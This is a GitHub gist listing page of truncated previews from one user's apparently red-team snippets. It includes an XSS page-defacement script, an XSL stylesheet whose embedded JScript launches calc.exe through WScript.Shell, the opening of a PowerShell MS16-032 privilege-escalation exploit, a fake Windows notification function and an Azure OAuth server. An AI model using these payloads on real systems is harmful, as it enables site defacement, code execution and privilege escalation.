benichmt1
/ stallowned.js
Created
July 13, 2018 20:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var title = "XSS Defacement"; | |
| var bgcolor = "#000000"; | |
| var image_url = "https://i.imgur.com/c7188co.jpg"; | |
| var text = "This page has been Hacked!"; | |
| var font_color = "#FF0000"; | |
| deface(title, bgcolor, image_url, text, font_color); | |
| function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) { | |
| document.title = pageTitle; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="Jscript"> | |
| <![CDATA[ | |
| var x = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
| ]]></ms:script> |
benichmt1
/ oauthServer.go
Last active
November 16, 2017 19:35
— forked from staaldraad/oauthServer.go
A mini OAuth server for Azure
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "crypto/tls" | |
| "fmt" | |
| "io/ioutil" | |
| "net/http" | |
| "net/url" | |
| "strings" | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Wlrmdr { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory = $True, Position = 0)] | |
| [String] $Message = "You are using pirated Windows", | |
| [Parameter(Mandatory = $True, Position = 1)] | |
| [String] $IconType = 'Key', | |
| [Parameter(Mandatory = $True, Position = 2)] | |
| [String] $Title = 'Windows Explorer' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # requirements: selenium wget python 2.7 | |
| import time | |
| import sys | |
| import wget | |
| from selenium import webdriver | |
| from selenium.webdriver.common.by import By | |
| from selenium.webdriver.support.ui import WebDriverWait | |
| from selenium.webdriver.support import expected_conditions as EC | |
| from selenium.webdriver.common.keys import Keys |
benichmt1
/ MS16-032.ps1
Last active
March 1, 2021 19:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-MS16-032 { | |
| <# | |
| .SYNOPSIS | |
| PowerShell implementation of MS16-032. The exploit targets all vulnerable | |
| operating systems that support PowerShell v2+. Credit for the discovery of | |
| the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. | |
| Modifications by Mike Benich (@benichmt1). | |
| Targets: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| file = open("/root/Desktop/enum.txt","r") | |
| out = open("enum-out.txt","w") | |
| text = file.read() | |
| m = re.findall(r'workgroup%5C(\w+)',text) | |
| if m: | |
| print ("\n".join(m)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am benichmt1 on github. | |
| * I am benichmt1 (https://keybase.io/benichmt1) on keybase. | |
| * I have a public key whose fingerprint is 25ED DBC4 1F27 0809 F976 591E 77BE 66D2 2608 12C9 | |
| To claim this, I am signing this object: |